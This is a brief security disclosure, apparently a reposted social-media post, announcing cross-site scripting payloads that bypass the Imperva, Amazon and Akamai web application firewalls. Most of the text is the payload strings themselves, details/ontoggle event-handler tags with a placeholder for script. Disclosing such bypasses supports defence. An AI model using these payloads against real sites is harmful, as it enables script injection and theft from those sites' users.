A XSS WAF Bypass affecting Imperva WAF has been disclosed. The bypass payload used is <details/open/id=""e;"ontoggle=[JS]>. This payload successfully bypasses Imperva WAF. Security researchers should be aware of this vulnerability and take necessary precautions.
XSS WAF Bypass:
Imperva
<details/open/id=""e;"ontoggle=[JS]>
Amazon
<details/open/id=""e;"ontoggle=[JS]>
Akamai
<details open id="' "e;'"ontoggle=[JS]>
— Ahmet Göker???? (@_shadowintel_) October 23, 2024